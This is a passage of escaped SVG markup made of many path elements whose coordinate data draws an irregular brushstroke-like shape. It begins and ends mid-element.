d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n        <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n        <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n        <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n        <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n        <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n        <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n        <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n        <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n        <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n        <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n        <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n        <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n        <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n        <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n        <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n        <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n        <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n        <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n        <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n        <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n        <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n        <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n        <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n        <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n        <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n        <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n        <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n        <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n        <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n        <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n        <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n        <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n        <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n        <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n        <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n        <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n        <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n        <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n        <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n        <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n        <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n        <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n        <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n        <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n        <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n        <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n        <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n        <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n        <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n        <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n        <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n        <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n        <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n        <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n        <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n        <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n        <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n        <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n        <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n        <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n        <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n        <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n        <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n        <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n        <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n        <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n        <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n        <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n        <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n        <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n        <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n        <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n        <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n        <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n        <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n        <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n        <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n        <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n        <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n        <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n        <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n        <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n        <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n        <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n        <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n        <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n        <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n        <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n        <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n        <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n        <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n        <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n        <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n        <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n        <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n        <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n        <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n        <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n        <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n        <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n        <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n        <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n        <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n        <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n        <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n        <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n        <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n        <path 